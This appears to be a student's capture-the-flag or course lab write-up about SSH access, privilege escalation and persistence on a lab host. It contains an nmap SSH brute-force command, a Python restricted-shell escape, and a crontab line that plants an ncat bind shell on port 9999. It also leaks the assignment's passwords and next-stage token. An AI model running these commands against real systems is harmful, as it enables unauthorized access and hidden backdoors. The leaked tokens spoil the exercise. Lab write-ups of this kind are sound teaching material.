# 6: Privilege Escalation and Persistence

The task is simple: Get SSH access to moriarty@192.168.1.193 and find flag.
We are given a hint: Despite being a criminal mastermind, 
this person loves reading superhero comic books….. nerd!

So first we tried to bruteforce the password for user moriarty using the list
of 1000 most common passwords (https://raw.githubusercontent.com/DavidWittman/wpxmlrpcbrute/master/wordlists/1000-most-common-passwords.txt)
and command:

```
sudo nmap -sS -sV -p 22 192.168.1.193 -v -n --script ssh-brute --script-args userdb=names.txt,passdb=1000-most-common-passwords.txt
```

This sadly failed and didn't find the correct password.
So we tried to guess what the password might be and on the first try we get in;
the password was 'batman'.

After getting in we see, that we have only 2 command available, python and ls.
Using python we are able to spawn a shell:

```
import os; print(os.system('/bin/bash'))
```

After that, we could roam freely all over the server.
First thing we did was to have some persistence we added following line to crontab:

```
(crontab -l ; echo "@reboot sleep 200 && ncat -l 9999 -k -c /bin/bash")|crontab 2> /dev/null
```

Which will upon reboot spawn a shell acessible on port 9999.

After that, we explore more of what we can do. After a few minutes we stumble upon
folder assignment07 under /home/user which contains script for the 7th assignment.
In file password_rotator.sh we find whole script for the assignment from which we draw following conclusions:

1. The passwords that the user rotates are: "superman" "ironman" "batman" "4a7#mgannn2LDD90T#1fX#0Yx%m!kxrMSmUXd60xKwdM0S6u"

2. The file with second token is: /var/tmp/tokens/second_token.txt and it's content
changes to following values: "Hysterical" "Spaghetti" "Floss" "Apparently"
which together give the token for second part of the assignment: HystericalSpaghettiFlossApparently
This token is also in the first comment in the script
```
#TOKEN:HystericalSpaghettiFlossApparently
```

3. The flag server for second part of the assignment is 192.168.1.167:9453

4. On password rotation all ssh session to moriarty are killed so we won't be able
to persist our ssh connection but we can definitely spawn a remote shell which shouldn't
get killed by the script.

After looking into the /vat/tmp/tokens folder we find token and flag server for first part
of the task as well. We try to submit both flags but flag for token for the part B doesn't
work which we later get to know was unintentional.
